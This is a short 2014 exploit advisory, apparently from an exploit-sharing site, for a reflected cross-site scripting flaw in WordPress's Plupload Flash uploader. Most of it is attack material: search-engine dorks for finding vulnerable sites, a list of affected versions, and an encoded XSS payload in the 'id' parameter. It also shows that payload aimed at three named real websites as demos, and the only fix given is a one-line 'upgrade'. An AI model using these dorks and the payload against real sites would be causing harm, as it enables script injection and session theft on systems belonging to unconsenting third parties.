facebook facebook twitter rss

Wordpress Plupload Cross Site Scripting Vulnerability

Author: sH@rk-Dz , Published: 29-06-2014
Bug Titile   : Wordpress Plupload Cross Site Scripting Vulnerability

Bug Author : sH@rk-Dz

Home : Sec4Ever.com

First D0rk : inurl:/wp-includes/js/plupload/

Seconde D0rk : powered by wordpress 3.3.2 Site: Use Your pritty Mine

Note : Versions Vulnerable 3.5, 3.4.2, 3.4.1, 3.4, 3.3.3 [*_*]

Date : 29/06/2014

FB : hasni.dzshark

Message : Saha Remdankoumme ALG & ARB & Algeria TEAM FOOTBALLEUR
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Vulnerability:

[-] http://localhost/wp-includes/js/plupload/plupload.flash.swf [-]

Exploition :

[+] http://localhost/wp-includes/js/plupload/plupload.flash.swf?id=| Xss | [+]


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Demo 1 : http://www.lia.ufc.br/~cloud/wp-includes/js/plupload/plupload.flash.swf?id=\%22%29%29;}catch%28e%29{alert%281%29;}//

Demo 2 : http://blog.smatrust.org/wp-includes/js/plupload/plupload.flash.swf?id=\%22%29%29;}catch%28e%29{alert%281%29;}//

Demo 3 : http://www.jonrobertson.com/wp-includes/js/plupload/plupload.flash.swf?id=\%22%29%29;}catch%28e%29{alert%281%29;}//

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

How To Fix This Vulnerability :

UPgrade to latest version of Plupload

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Like us on Facebook :